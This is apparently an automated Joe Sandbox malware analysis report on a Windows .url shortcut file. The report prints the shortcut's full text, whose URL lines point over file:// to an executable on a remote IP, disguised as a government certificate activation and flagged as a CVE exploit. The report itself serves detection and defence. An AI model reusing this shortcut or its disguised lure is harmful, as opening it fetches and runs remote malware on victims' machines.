Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3d#U0430.url

Overview

General Information

Sample name:3d#U0430.url
renamed because original name is a hash value
Original sample name: .url
Analysis ID:1561507
MD5:9aff477d681be77815b141cad037d7b6
SHA1:1da43753c3b48eb25180b04a2e7c6d64d9159be5
SHA256:8cf24fe1384ca8ea763081b78fd14995704bbd73a871ebe1c362053767aeec20
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Found malicious URL file
Suricata IDS alerts with low severity for network traffic

Classification

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-23T16:13:33.349670+010020283713Unknown Traffic192.168.2.45001720.42.65.84443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 3d#U0430.urlReversingLabs: Detection: 42%
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50017 -> 20.42.65.84:443

System Summary

barindex
Found malicious URL file
Source: 3d#U0430.urlInitial sample: [InternetShortcut]URL=file://92.42.96.30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exeIconIndex=1HotKey=0IDList=IconFile=C:\Windows\System32\SHELL32.dll[{009862A0-0000-0000-C000-000000005986}]Prop3=19,9[{000214A0-0000-0000-C000-000000000046}]Prop3=19,9[InternetShortcut.A][InternetShortcut.W]URL=file://92.42.96.30/Activation/Certificate+AF8hFgBf-45052389+AF8-005553.exe
Source: classification engineClassification label: mal52.winURL@0/0@0/0
Source: 3d#U0430.urlReversingLabs: Detection: 42%

Mitre Att&ck Matrix

No Mitre Att&ck techniques found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
3d#U0430.url42%ReversingLabsShortcut.Exploit.CVE-2024-4351

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1561507
Start date and time:2024-11-23 16:07:46 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 22s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:3d#U0430.url
renamed because original name is a hash value
Original Sample Name: .url
Detection:MAL
Classification:mal52.winURL@0/0@0/0
Cookbook Comments:
  • Found application associated with file extension: .url
  • Stop behavior analysis, all processes terminated

Errors

  • No process behavior to analyse as no analysis process or sample was found

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • VT rate limit hit for: 3d#U0430.url

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:MS Windows 95 Internet shortcut text (URL=<file://92.42.96.30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exe>), ASCII text, with CRLF line terminators
Entropy (8bit):5.300940822861295
TrID:
  • Windows URL shortcut (11001/1) 91.66%
  • Generic INI configuration (1001/1) 8.34%
File name:3d#U0430.url
File size:407 bytes
MD5:9aff477d681be77815b141cad037d7b6
SHA1:1da43753c3b48eb25180b04a2e7c6d64d9159be5
SHA256:8cf24fe1384ca8ea763081b78fd14995704bbd73a871ebe1c362053767aeec20
SHA512:0ac9cb5cf7e0f7aeae2129c7182dca232a9932328404a6a592ceb26296b7b60399d7e741509d839917afc2f1eab92bc02980fbc07a0dc47e9192079c91747cc7
SSDEEP:12:HRYFVmdg97y51EDYQ89nycXaVWfmJAVW4xhFYFeLpYddZVEI1oYn:HOFVmh5q0Q89nympfk34xhFYFa2rvoYn
TLSH:F1E02B18D59DD5D1C6132C4E5161F885EC0FB4C909F3D88C25D7D9CA1C62471CA4CFA2
File Content Preview:[InternetShortcut]..URL=file://92.42.96.30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exe..IconIndex=1..HotKey=0..IDList=..IconFile=C:\Windows\System32\SHELL32.dll..[{009862A0-0000-0000-C000-000000005986}]..Prop3=19,9..[{000214A0-0000-0000-C000-

File Icon

Icon Hash:6de5a7b7b3b3a185

Network Behavior

No network behavior found

Statistics

No statistics

System Behavior

No system behavior

Disassembly

No disassembly